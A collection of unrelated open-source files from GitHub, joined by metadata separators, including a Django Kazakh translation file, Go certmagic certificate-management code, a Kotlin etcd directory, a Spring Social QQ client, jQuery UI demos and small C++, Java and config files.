"template is used to generate the page and which objects are available to "
"that template."
msgstr ""
msgid "Tools for your browser to quickly access admin functionality."
msgstr ""
msgid "Please install docutils"
msgstr ""
#, python-format
msgid ""
"The admin documentation system requires Python's <a href=\"%(link)s"
"\">docutils</a> library."
msgstr ""
#, python-format
msgid ""
"Please ask your administrators to install <a href=\"%(link)s\">docutils</a>."
msgstr ""
#, python-format
msgid "Model: %(name)s"
msgstr ""
msgid "Fields"
msgstr ""
msgid "Field"
msgstr ""
msgid "Type"
msgstr ""
msgid "Description"
msgstr ""
msgid "Methods with arguments"
msgstr ""
msgid "Method"
msgstr ""
msgid "Arguments"
msgstr ""
msgid "Back to Model documentation"
msgstr ""
msgid "Model documentation"
msgstr ""
msgid "Model groups"
msgstr ""
msgid "Templates"
msgstr ""
#, python-format
msgid "Template: %(name)s"
msgstr ""
#, python-format
msgid "Template: \"%(name)s\""
msgstr ""
#. Translators: Search is not a verb here, it qualifies path (a search path)
#, python-format
msgid "Search path for template \"%(name)s\":"
msgstr ""
msgid "(does not exist)"
msgstr ""
msgid "Back to Documentation"
msgstr ""
msgid "Template filters"
msgstr ""
msgid "Template filter documentation"
msgstr ""
msgid "Built-in filters"
msgstr ""
#, python-format
msgid ""
"To use these filters, put <code>%(code)s</code> in your template before "
"using the filter."
msgstr ""
msgid "Template tags"
msgstr ""
msgid "Template tag documentation"
msgstr ""
msgid "Built-in tags"
msgstr ""
#, python-format
msgid ""
"To use these tags, put <code>%(code)s</code> in your template before using "
"the tag."
msgstr ""
#, python-format
msgid "View: %(name)s"
msgstr ""
msgid "Context:"
msgstr ""
msgid "Templates:"
msgstr ""
msgid "Back to View documentation"
msgstr ""
msgid "View documentation"
msgstr ""
msgid "Jump to namespace"
msgstr ""
msgid "Empty namespace"
msgstr ""
#, python-format
msgid "Views by namespace %(name)s"
msgstr ""
msgid "Views by empty namespace"
msgstr ""
#, python-format
msgid ""
"\n"
" View function: <code>%(full_name)s</code>. Name: <code>%(url_name)s</"
"code>.\n"
msgstr ""
msgid "tag:"
msgstr "тег:"
msgid "filter:"
msgstr "сүзгіш:"
msgid "view:"
msgstr "көрініс:"
#, python-format
msgid "App %(app_label)r not found"
msgstr ""
#, python-format
msgid "Model %(model_name)r not found in app %(app_label)r"
msgstr "%(app_label)r app ішінен %(model_name)r үлгісі табылмады"
msgid "model:"
msgstr "модель:"
#, python-format
msgid "the related `%(app_label)s.%(data_type)s` object"
msgstr "байланысты `%(app_label)s.%(data_type)s` объект"
#, python-format
msgid "related `%(app_label)s.%(object_name)s` objects"
msgstr "байланысты `%(app_label)s.%(object_name)s` объекттер"
#, python-format
msgid "all %s"
msgstr "барлық %s"
#, python-format
msgid "number of %s"
msgstr "%s саны"
#, python-format
msgid "%s does not appear to be a urlpattern object"
msgstr "%s urlpattern объектке ұқсамайды"
| {
"pile_set_name": "Github"
} |
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.psi.search;
import com.intellij.openapi.project.Project;
import org.jetbrains.annotations.NotNull;
/**
* A {@code VirtualFile} that needs to be included in a project scope.
*
* @author gregsh
*/
public interface ProjectAwareVirtualFile {
boolean isInProject(@NotNull Project project);
}
| {
"pile_set_name": "Github"
} |
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>jQuery UI Dialog - Modal confirmation</title>
<link rel="stylesheet" href="../../themes/base/jquery.ui.all.css">
<script src="../../jquery-1.9.1.js"></script>
<script src="../../ui/jquery.ui.core.js"></script>
<script src="../../ui/jquery.ui.widget.js"></script>
<script src="../../ui/jquery.ui.mouse.js"></script>
<script src="../../ui/jquery.ui.button.js"></script>
<script src="../../ui/jquery.ui.draggable.js"></script>
<script src="../../ui/jquery.ui.position.js"></script>
<script src="../../ui/jquery.ui.button.js"></script>
<script src="../../ui/jquery.ui.dialog.js"></script>
<link rel="stylesheet" href="../demos.css">
<script>
$(function() {
$( "#dialog-confirm" ).dialog({
resizable: false,
height:140,
modal: true,
buttons: {
"Delete all items": function() {
$( this ).dialog( "close" );
},
Cancel: function() {
$( this ).dialog( "close" );
}
}
});
});
</script>
</head>
<body>
<div id="dialog-confirm" title="Empty the recycle bin?">
<p><span class="ui-icon ui-icon-alert" style="float:left; margin:0 7px 20px 0;"></span>These items will be permanently deleted and cannot be recovered. Are you sure?</p>
</div>
<p>Sed vel diam id libero <a href="http://example.com">rutrum convallis</a>. Donec aliquet leo vel magna. Phasellus rhoncus faucibus ante. Etiam bibendum, enim faucibus aliquet rhoncus, arcu felis ultricies neque, sit amet auctor elit eros a lectus.</p>
<div class="demo-description">
<p>Confirm an action that may be destructive or important. Set the <code>modal</code> option to true, and specify primary and secondary user actions with the <code>buttons</code> option.</p>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
//===--- TerminalDisplayUnix.h - Output To UNIX Terminal --------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file defines the interface for writing to a UNIX terminal. It tries to
// support all "common" terminal types.
//
// Axel Naumann <[email protected]>, 2011-05-12
//===----------------------------------------------------------------------===//
#ifndef TEXTINPUT_TERMINALDISPLAYUNIX_H
#define TEXTINPUT_TERMINALDISPLAYUNIX_H
#include <cstddef>
#include "textinput/TerminalDisplay.h"
namespace textinput {
class Color;
// Output to tty / pipe / file.
class TerminalDisplayUnix: public TerminalDisplay {
public:
TerminalDisplayUnix();
~TerminalDisplayUnix();
void HandleResizeSignal();
void Attach();
void Detach();
protected:
void MoveUp(size_t nLines = 1);
void MoveDown(size_t nLines = 1);
void MoveLeft(size_t nCols = 1);
void MoveRight(size_t nCols = 1);
void MoveInternal(char What, size_t n);
void MoveFront();
void SetColor(char CIdx, const Color& C);
void WriteRawString(const char* text, size_t len);
void ActOnEOL();
void EraseToRight();
int GetClosestColorIdx256(const Color& C);
int GetClosestColorIdx16(const Color& C);
private:
bool fIsAttached; // whether tty is configured
size_t fNColors; // number of colors supported by output
int fOutputID; // Prompt output file descriptor
};
}
#endif // TEXTINPUT_TERMINALDISPLAYUNIX_H
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<p>Directory access is forbidden.</p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
// This file is distributed under the MIT license.
// See the LICENSE file for details.
#pragma once
#ifndef VSNRAY_MEDIUM_H
#define VSNRAY_MEDIUM_H 1
#include "phase_function.h"
#include "spectrum.h"
namespace visionaray
{
template <typename T>
class anisotropic_medium
{
public:
using scalar_type = T;
public:
template <typename U>
VSNRAY_FUNC
spectrum<U> tr(vector<3, U> const& wo, vector<3, U> const& wi)
{
return spectrum<U>(phase_.tr(wo, wi));
}
template <typename U, typename Generator>
VSNRAY_FUNC
spectrum<U> sample(vector<3, U> const& wo, vector<3, U>& wi, U& pdf, Generator& gen)
{
return spectrum<U>(phase_.sample(wo, wi, pdf, gen));
}
// Anisotropy in [-1.0..1.0], where -1.0 scatters all light backwards
T& anisotropy()
{
return phase_.g;
}
// Anisotropy in [-1.0..1.0], where -1.0 scatters all light backwards
VSNRAY_FUNC T const& anisotropy() const
{
return phase_.g;
}
private:
henyey_greenstein<T> phase_;
};
} // visionaray
#endif // VSNRAY_MEDIUM_H
| {
"pile_set_name": "Github"
} |
/**
*
*/
package com.imooc.security.core.social.qq.api;
import org.apache.commons.lang.StringUtils;
import org.springframework.social.oauth2.AbstractOAuth2ApiBinding;
import org.springframework.social.oauth2.TokenStrategy;
import com.fasterxml.jackson.databind.ObjectMapper;
/**
* @author zhailiang
*
*/
public class QQImpl extends AbstractOAuth2ApiBinding implements QQ {
private static final String URL_GET_OPENID = "https://graph.qq.com/oauth2.0/me?access_token=%s";
private static final String URL_GET_USERINFO = "https://graph.qq.com/user/get_user_info?oauth_consumer_key=%s&openid=%s";
private String appId;
private String openId;
private ObjectMapper objectMapper = new ObjectMapper();
public QQImpl(String accessToken, String appId) {
super(accessToken, TokenStrategy.ACCESS_TOKEN_PARAMETER);
this.appId = appId;
String url = String.format(URL_GET_OPENID, accessToken);
String result = getRestTemplate().getForObject(url, String.class);
System.out.println(result);
this.openId = StringUtils.substringBetween(result, "\"openid\":\"", "\"}");
}
/* (non-Javadoc)
* @see com.imooc.security.core.social.qq.api.QQ#getUserInfo()
*/
@Override
public QQUserInfo getUserInfo() {
String url = String.format(URL_GET_USERINFO, appId, openId);
String result = getRestTemplate().getForObject(url, String.class);
System.out.println(result);
QQUserInfo userInfo = null;
try {
userInfo = objectMapper.readValue(result, QQUserInfo.class);
userInfo.setOpenId(openId);
return userInfo;
} catch (Exception e) {
throw new RuntimeException("获取用户信息失败", e);
}
}
}
| {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
require "test_helper"
class FormCore::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, FormCore
end
end
| {
"pile_set_name": "Github"
} |
package org.standardnotes.notes.comms.data;
import java.util.ArrayList;
import java.util.List;
import javax.annotation.Generated;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
/**
*
* <p>
*
*
*/
@Generated("org.jsonschema2pojo")
public class NoteContent {
@SerializedName("title")
@Expose
private String title = "";
@SerializedName("text")
@Expose
private String text = "";
@SerializedName("references")
@Expose
private List<Reference> references = new ArrayList<Reference>();
/**
*
* @return
* The title
*/
public String getTitle() {
return title;
}
/**
*
* @param title
* The title
*/
public void setTitle(String title) {
this.title = title;
}
/**
*
* @return
* The text
*/
public String getText() {
return text;
}
/**
*
* @param text
* The text
*/
public void setText(String text) {
this.text = text;
}
/**
*
* @return
* The references
*/
public List<Reference> getReferences() {
return references;
}
/**
*
* @param references
* The references
*/
public void setReferences(List<Reference> references) {
this.references = references;
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<SampleMetadata>
<ID>EC6AC243-478A-4BC3-B456-7D6D81E19EA3</ID>
<Brief>Sample code for the Xamarin watchOS Complications documentation.</Brief>
<IsFullApplication>false</IsFullApplication>
<Level>Beginner</Level>
<Tags>iOS10, Watch, User Interface, Getting Started</Tags>
<SupportedPlatforms>iOS</SupportedPlatforms>
<Gallery>true</Gallery>
<MinimumLicenseRequirement>Starter</MinimumLicenseRequirement>
<Description>Sample code for the Xamarin watchOS Complication documentation, demonstrating how to add a complication to the watch face.</Description>
</SampleMetadata>
| {
"pile_set_name": "Github"
} |
// Copyright 2015 Matthew Holt
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package certmagic
import (
"crypto/tls"
"crypto/x509"
"fmt"
"io/ioutil"
"net"
"strings"
"time"
"go.uber.org/zap"
"golang.org/x/crypto/ocsp"
)
// Certificate is a tls.Certificate with associated metadata tacked on.
// Even if the metadata can be obtained by parsing the certificate,
// we are more efficient by extracting the metadata onto this struct,
// but at the cost of slightly higher memory use.
type Certificate struct {
tls.Certificate
// Names is the list of subject names this
// certificate is signed for.
Names []string
// Optional; user-provided, and arbitrary.
Tags []string
// OCSP contains the certificate's parsed OCSP response.
ocsp *ocsp.Response
// The hex-encoded hash of this cert's chain's bytes.
hash string
// Whether this certificate is under our management
managed bool
}
// NeedsRenewal returns true if the certificate is
// expiring soon (according to cfg) or has expired.
func (cert Certificate) NeedsRenewal(cfg *Config) bool {
return currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio)
}
// Expired returns true if the certificate has expired.
func (cert Certificate) Expired() bool {
if cert.Leaf == nil {
// ideally cert.Leaf would never be nil, but this can happen for
// "synthetic" certs like those made to solve the TLS-ALPN challenge
// which adds a special cert directly to the cache, since
// tls.X509KeyPair() discards the leaf; oh well
return false
}
return time.Now().After(cert.Leaf.NotAfter)
}
// currentlyInRenewalWindow returns true if the current time is
// within the renewal window, according to the given start/end
// dates and the ratio of the renewal window. If true is returned,
// the certificate being considered is due for renewal.
func currentlyInRenewalWindow(notBefore, notAfter time.Time, renewalWindowRatio float64) bool {
if notAfter.IsZero() {
return false
}
lifetime := notAfter.Sub(notBefore)
if renewalWindowRatio == 0 {
renewalWindowRatio = DefaultRenewalWindowRatio
}
renewalWindow := time.Duration(float64(lifetime) * renewalWindowRatio)
renewalWindowStart := notAfter.Add(-renewalWindow)
return time.Now().After(renewalWindowStart)
}
// HasTag returns true if cert.Tags has tag.
func (cert Certificate) HasTag(tag string) bool {
for _, t := range cert.Tags {
if t == tag {
return true
}
}
return false
}
// CacheManagedCertificate loads the certificate for domain into the
// cache, from the TLS storage for managed certificates. It returns a
// copy of the Certificate that was put into the cache.
//
// This is a lower-level method; normally you'll call Manage() instead.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheManagedCertificate(domain string) (Certificate, error) {
cert, err := cfg.loadManagedCertificate(domain)
if err != nil {
return cert, err
}
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_managed_cert", cert.Names)
return cert, nil
}
// loadManagedCertificate loads the managed certificate for domain,
// but it does not add it to the cache. It just loads from storage.
func (cfg *Config) loadManagedCertificate(domain string) (Certificate, error) {
certRes, err := cfg.loadCertResource(domain)
if err != nil {
return Certificate{}, err
}
cert, err := cfg.makeCertificateWithOCSP(certRes.CertificatePEM, certRes.PrivateKeyPEM)
if err != nil {
return cert, err
}
cert.managed = true
return cert, nil
}
// CacheUnmanagedCertificatePEMFile loads a certificate for host using certFile
// and keyFile, which must be in PEM format. It stores the certificate in
// the in-memory cache.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedCertificatePEMFile(certFile, keyFile string, tags []string) error {
cert, err := cfg.makeCertificateFromDiskWithOCSP(cfg.Storage, certFile, keyFile)
if err != nil {
return err
}
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_unmanaged_cert", cert.Names)
return nil
}
// CacheUnmanagedTLSCertificate adds tlsCert to the certificate cache.
// It staples OCSP if possible.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedTLSCertificate(tlsCert tls.Certificate, tags []string) error {
var cert Certificate
err := fillCertFromLeaf(&cert, tlsCert)
if err != nil {
return err
}
_, err = stapleOCSP(cfg.Storage, &cert, nil)
if err != nil && cfg.Logger != nil {
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
}
cfg.emit("cached_unmanaged_cert", cert.Names)
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
return nil
}
// CacheUnmanagedCertificatePEMBytes makes a certificate out of the PEM bytes
// of the certificate and key, then caches it in memory.
//
// This method is safe for concurrent use.
func (cfg *Config) CacheUnmanagedCertificatePEMBytes(certBytes, keyBytes []byte, tags []string) error {
cert, err := cfg.makeCertificateWithOCSP(certBytes, keyBytes)
if err != nil {
return err
}
cert.Tags = tags
cfg.certCache.cacheCertificate(cert)
cfg.emit("cached_unmanaged_cert", cert.Names)
return nil
}
// makeCertificateFromDiskWithOCSP makes a Certificate by loading the
// certificate and key files. It fills out all the fields in
// the certificate except for the Managed and OnDemand flags.
// (It is up to the caller to set those.) It staples OCSP.
func (cfg Config) makeCertificateFromDiskWithOCSP(storage Storage, certFile, keyFile string) (Certificate, error) {
certPEMBlock, err := ioutil.ReadFile(certFile)
if err != nil {
return Certificate{}, err
}
keyPEMBlock, err := ioutil.ReadFile(keyFile)
if err != nil {
return Certificate{}, err
}
return cfg.makeCertificateWithOCSP(certPEMBlock, keyPEMBlock)
}
// makeCertificateWithOCSP is the same as makeCertificate except that it also
// staples OCSP to the certificate.
func (cfg Config) makeCertificateWithOCSP(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
cert, err := makeCertificate(certPEMBlock, keyPEMBlock)
if err != nil {
return cert, err
}
_, err = stapleOCSP(cfg.Storage, &cert, certPEMBlock)
if err != nil && cfg.Logger != nil {
cfg.Logger.Warn("stapling OCSP", zap.Error(err))
}
return cert, nil
}
// makeCertificate turns a certificate PEM bundle and a key PEM block into
// a Certificate with necessary metadata from parsing its bytes filled into
// its struct fields for convenience (except for the OnDemand and Managed
// flags; it is up to the caller to set those properties!). This function
// does NOT staple OCSP.
func makeCertificate(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
var cert Certificate
// Convert to a tls.Certificate
tlsCert, err := tls.X509KeyPair(certPEMBlock, keyPEMBlock)
if err != nil {
return cert, err
}
// Extract necessary metadata
err = fillCertFromLeaf(&cert, tlsCert)
if err != nil {
return cert, err
}
return cert, nil
}
// fillCertFromLeaf populates cert from tlsCert. If it succeeds, it
// guarantees that cert.Leaf is non-nil.
func fillCertFromLeaf(cert *Certificate, tlsCert tls.Certificate) error {
if len(tlsCert.Certificate) == 0 {
return fmt.Errorf("certificate is empty")
}
cert.Certificate = tlsCert
// the leaf cert should be the one for the site; we must set
// the tls.Certificate.Leaf field so that TLS handshakes are
// more efficient
leaf, err := x509.ParseCertificate(tlsCert.Certificate[0])
if err != nil {
return err
}
cert.Certificate.Leaf = leaf
// for convenience, we do want to assemble all the
// subjects on the certificate into one list
if leaf.Subject.CommonName != "" { // TODO: CommonName is deprecated
cert.Names = []string{strings.ToLower(leaf.Subject.CommonName)}
}
for _, name := range leaf.DNSNames {
if name != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(name))
}
}
for _, ip := range leaf.IPAddresses {
if ipStr := ip.String(); ipStr != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(ipStr))
}
}
for _, email := range leaf.EmailAddresses {
if email != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, strings.ToLower(email))
}
}
for _, u := range leaf.URIs {
if u.String() != leaf.Subject.CommonName { // TODO: CommonName is deprecated
cert.Names = append(cert.Names, u.String())
}
}
if len(cert.Names) == 0 {
return fmt.Errorf("certificate has no names")
}
// save the hash of this certificate (chain) and
// expiration date, for necessity and efficiency
cert.hash = hashCertificateChain(cert.Certificate.Certificate)
return nil
}
// managedCertInStorageExpiresSoon returns true if cert (being a
// managed certificate) is expiring within RenewDurationBefore.
// It returns false if there was an error checking the expiration
// of the certificate as found in storage, or if the certificate
// in storage is NOT expiring soon. A certificate that is expiring
// soon in our cache but is not expiring soon in storage probably
// means that another instance renewed the certificate in the
// meantime, and it would be a good idea to simply load the cert
// into our cache rather than repeating the renewal process again.
func (cfg *Config) managedCertInStorageExpiresSoon(cert Certificate) (bool, error) {
certRes, err := cfg.loadCertResource(cert.Names[0])
if err != nil {
return false, err
}
tlsCert, err := tls.X509KeyPair(certRes.CertificatePEM, certRes.PrivateKeyPEM)
if err != nil {
return false, err
}
leaf, err := x509.ParseCertificate(tlsCert.Certificate[0])
if err != nil {
return false, err
}
return currentlyInRenewalWindow(leaf.NotBefore, leaf.NotAfter, cfg.RenewalWindowRatio), nil
}
// reloadManagedCertificate reloads the certificate corresponding to the name(s)
// on oldCert into the cache, from storage. This also replaces the old certificate
// with the new one, so that all configurations that used the old cert now point
// to the new cert. It assumes that the new certificate for oldCert.Names[0] is
// already in storage.
func (cfg *Config) reloadManagedCertificate(oldCert Certificate) error {
if cfg.Logger != nil {
cfg.Logger.Info("reloading managed certificate", zap.Strings("identifiers", oldCert.Names))
}
newCert, err := cfg.loadManagedCertificate(oldCert.Names[0])
if err != nil {
return fmt.Errorf("loading managed certificate for %v from storage: %v", oldCert.Names, err)
}
cfg.certCache.replaceCertificate(oldCert, newCert)
return nil
}
// SubjectQualifiesForCert returns true if subj is a name which,
// as a quick sanity check, looks like it could be the subject
// of a certificate. Requirements are:
// - must not be empty
// - must not start or end with a dot (RFC 1034)
// - must not contain common accidental special characters
func SubjectQualifiesForCert(subj string) bool {
// must not be empty
return strings.TrimSpace(subj) != "" &&
// must not start or end with a dot
!strings.HasPrefix(subj, ".") &&
!strings.HasSuffix(subj, ".") &&
// if it has a wildcard, must be a left-most label
(!strings.Contains(subj, "*") || strings.HasPrefix(subj, "*.")) &&
// must not contain other common special characters
!strings.ContainsAny(subj, "()[]{}<> \t\n\"\\!@#$%^&|;'+=")
}
// SubjectQualifiesForPublicCert returns true if the subject
// name appears eligible for automagic TLS with a public
// CA such as Let's Encrypt. For example: localhost and IP
// addresses are not eligible because we cannot obtain certs
// for those names with a public CA. Wildcard names are
// allowed, as long as they conform to CABF requirements (only
// one wildcard label, and it must be the left-most label).
func SubjectQualifiesForPublicCert(subj string) bool {
// must at least qualify for certificate
return SubjectQualifiesForCert(subj) &&
// localhost is ineligible
subj != "localhost" &&
// .localhost TLD is ineligible
!strings.HasSuffix(subj, ".localhost") &&
// .local TLD is ineligible
!strings.HasSuffix(subj, ".local") &&
// only one wildcard label allowed, and it must be left-most
(!strings.Contains(subj, "*") ||
(strings.Count(subj, "*") == 1 &&
len(subj) > 2 &&
strings.HasPrefix(subj, "*."))) &&
// cannot be an IP address (as of yet), see
// https://community.letsencrypt.org/t/certificate-for-static-ip/84/2?u=mholt
net.ParseIP(subj) == nil
}
// MatchWildcard returns true if subject (a candidate DNS name)
// matches wildcard (a reference DNS name), mostly according to
// RFC6125-compliant wildcard rules.
func MatchWildcard(subject, wildcard string) bool {
if subject == wildcard {
return true
}
if !strings.Contains(wildcard, "*") {
return false
}
labels := strings.Split(subject, ".")
for i := range labels {
if labels[i] == "" {
continue // invalid label
}
labels[i] = "*"
candidate := strings.Join(labels, ".")
if candidate == wildcard {
return true
}
}
return false
}
| {
"pile_set_name": "Github"
} |
# Untitled
| {
"pile_set_name": "Github"
} |
version: '2.1'
services:
php:
image: '7.1'
build:
args:
version: 7.1-cli
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2015 - 2019 Electronic Arts Inc. All rights reserved.
This file is part of the Orbit Project <https://www.orbit.cloud>.
See license in LICENSE.
*/
package orbit.server.etcd
import io.etcd.jetcd.ByteSequence
import io.etcd.jetcd.Client
import io.etcd.jetcd.options.GetOption
import io.etcd.jetcd.options.PutOption
import kotlinx.coroutines.TimeoutCancellationException
import kotlinx.coroutines.future.await
import kotlinx.coroutines.withTimeout
import mu.KotlinLogging
import orbit.server.mesh.AddressableDirectory
import orbit.shared.addressable.AddressableLease
import orbit.shared.addressable.NamespacedAddressableReference
import orbit.shared.proto.Addressable
import orbit.shared.proto.toAddressableLease
import orbit.shared.proto.toAddressableLeaseProto
import orbit.util.di.ExternallyConfigured
import orbit.util.time.Clock
import orbit.util.time.Timestamp
import java.util.concurrent.ExecutionException
import java.util.concurrent.atomic.AtomicBoolean
import java.util.concurrent.atomic.AtomicLong
class EtcdAddressableDirectory(config: EtcdAddressableDirectoryConfig, private val clock: Clock) :
AddressableDirectory {
data class EtcdAddressableDirectoryConfig(
val url: String = System.getenv("ADDRESSABLE_DIRECTORY") ?: "0.0.0.0"
) : ExternallyConfigured<AddressableDirectory> {
override val instanceType: Class<out AddressableDirectory> = EtcdAddressableDirectory::class.java
}
private val keyPrefix = "addressable"
private val allKey = ByteSequence.from("\u0000".toByteArray())
private val logger = KotlinLogging.logger { }
private val client = Client.builder().endpoints(config.url).build()
private val kvClient = client.kvClient
private val leaseClient = client.leaseClient
private val lastHealthCheckTime = AtomicLong(0)
private val lastHealthCheck = AtomicBoolean(false)
override suspend fun isHealthy(): Boolean {
if (lastHealthCheckTime.get() + 5000 > clock.currentTime) {
return lastHealthCheck.get()
}
try {
lastHealthCheckTime.set(clock.currentTime)
withTimeout(3000) {
getLease(Timestamp.now())
}
lastHealthCheck.set(true)
return true
} catch (e: TimeoutCancellationException) {
lastHealthCheck.set(false)
return false
} catch (e: ExecutionException) {
lastHealthCheck.set(false)
return false
}
}
override suspend fun count() =
kvClient.get(
allKey, GetOption.newBuilder()
.withSortField(GetOption.SortTarget.KEY)
.withSortOrder(GetOption.SortOrder.DESCEND)
.withPrefix(ByteSequence.from(keyPrefix.toByteArray()))
.withCountOnly(true)
.withRange(allKey)
.build()
).await().count
suspend fun getLease(time: Timestamp): PutOption {
val lease = leaseClient.grant(clock.until(time).seconds).await()
return PutOption.newBuilder().withLeaseId(lease.id).build()
}
override suspend fun get(key: NamespacedAddressableReference): AddressableLease? {
val response = kvClient.get(toByteKey(key)).await()
return response.kvs.firstOrNull()?.value?.let {
Addressable.AddressableLeaseProto.parseFrom(it.bytes).toAddressableLease()
}
}
override suspend fun remove(key: NamespacedAddressableReference): Boolean {
kvClient.delete(toByteKey(key))
return true
}
override suspend fun compareAndSet(
key: NamespacedAddressableReference,
initialValue: AddressableLease?,
newValue: AddressableLease?
): Boolean {
val byteKey = toByteKey(key)
val entry = kvClient.get(byteKey).await().kvs.firstOrNull()
val oldValue = entry?.value?.bytes?.let {
Addressable.AddressableLeaseProto.parseFrom(it).toAddressableLease()
}
if (initialValue == oldValue) {
if (newValue != null) {
kvClient.put(
byteKey,
ByteSequence.from(newValue.toAddressableLeaseProto().toByteArray()),
getLease(newValue.expiresAt)
).await()
} else {
kvClient.delete(byteKey).await()
}
return true
}
return false
}
private fun toByteKey(reference: NamespacedAddressableReference): ByteSequence {
return ByteSequence.from("$keyPrefix/${reference.namespace}/${reference.addressableReference.type}/${reference.addressableReference.key}".toByteArray())
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build windows
// Package windows contains an interface to the low-level operating system
// primitives. OS details vary depending on the underlying system, and
// by default, godoc will display the OS-specific documentation for the current
// system. If you want godoc to display syscall documentation for another
// system, set $GOOS and $GOARCH to the desired system. For example, if
// you want to view documentation for freebsd/arm on linux/amd64, set $GOOS
// to freebsd and $GOARCH to arm.
//
// The primary use of this package is inside other packages that provide a more
// portable interface to the system, such as "os", "time" and "net". Use
// those packages rather than this one if you can.
//
// For details of the functions and data types in this package consult
// the manuals for the appropriate operating system.
//
// These calls return err == nil to indicate success; otherwise
// err represents an operating system error describing the failure and
// holds a value of type syscall.Errno.
package windows // import "golang.org/x/sys/windows"
import (
"syscall"
)
// ByteSliceFromString returns a NUL-terminated slice of bytes
// containing the text of s. If s contains a NUL byte at any
// location, it returns (nil, syscall.EINVAL).
func ByteSliceFromString(s string) ([]byte, error) {
for i := 0; i < len(s); i++ {
if s[i] == 0 {
return nil, syscall.EINVAL
}
}
a := make([]byte, len(s)+1)
copy(a, s)
return a, nil
}
// BytePtrFromString returns a pointer to a NUL-terminated array of
// bytes containing the text of s. If s contains a NUL byte at any
// location, it returns (nil, syscall.EINVAL).
func BytePtrFromString(s string) (*byte, error) {
a, err := ByteSliceFromString(s)
if err != nil {
return nil, err
}
return &a[0], nil
}
// Single-word zero for use when we need a valid pointer to 0 bytes.
// See mksyscall.pl.
var _zero uintptr
func (ts *Timespec) Unix() (sec int64, nsec int64) {
return int64(ts.Sec), int64(ts.Nsec)
}
func (tv *Timeval) Unix() (sec int64, nsec int64) {
return int64(tv.Sec), int64(tv.Usec) * 1000
}
func (ts *Timespec) Nano() int64 {
return int64(ts.Sec)*1e9 + int64(ts.Nsec)
}
func (tv *Timeval) Nano() int64 {
return int64(tv.Sec)*1e9 + int64(tv.Usec)*1000
}
| {
"pile_set_name": "Github"
} |
/*
* jQuery UI Effects Slide 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Slide
*
* Depends:
* effects.core.js
*/
(function($) {
$.effects.slide = function(o) {
return this.queue(function() {
// Create element
var el = $(this), props = ['position','top','left'];
// Set options
var mode = $.effects.setMode(el, o.options.mode || 'show'); // Set Mode
var direction = o.options.direction || 'left'; // Default Direction
// Adjust
$.effects.save(el, props); el.show(); // Save & Show
$.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
var distance = o.options.distance || (ref == 'top' ? el.outerHeight({margin:true}) : el.outerWidth({margin:true}));
if (mode == 'show') el.css(ref, motion == 'pos' ? -distance : distance); // Shift
// Animation
var animation = {};
animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance;
// Animate
el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
if(mode == 'hide') el.hide(); // Hide
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
if(o.callback) o.callback.apply(this, arguments); // Callback
el.dequeue();
}});
});
};
})(jQuery);
| {
"pile_set_name": "Github"
} |
**Welcome to Documentation.** You can go ahead and delete this page whenever you're ready. It contains some information as well as being a good reference point for how things will be styled. Every page in Documentation is formatted with Markdown (although there are a couple of additions which are demonstrated here).
## Features
* A simple & attractive interface for viewing & editing your pages
* Store pages in a hierarchy
* Modular authorisation architecture
* Modular search backend architecture
* Full i18n support
* Override any views as necessary within your Rails application
Recommendation: Take a look through all the pages in this guide while developing your application. If you delete this section, you can always re-add it by running `rake documentation:install_guides` from the root of your Rails application.
## Useful links
The links below provide you with easy access to key resources which will help you.
* [Browse source code on GitHub](https://github.com/adamcooke/documentation)
* [View issues](https://github.com/adamcooke/documentation/issues)
* [Check out the installation guide](https://github.com/adamcooke/documentation/blob/master/README.md) | {
"pile_set_name": "Github"
} |
/* Class = "NSTextFieldCell"; title = "Last Refreshed:"; ObjectID = "105"; */
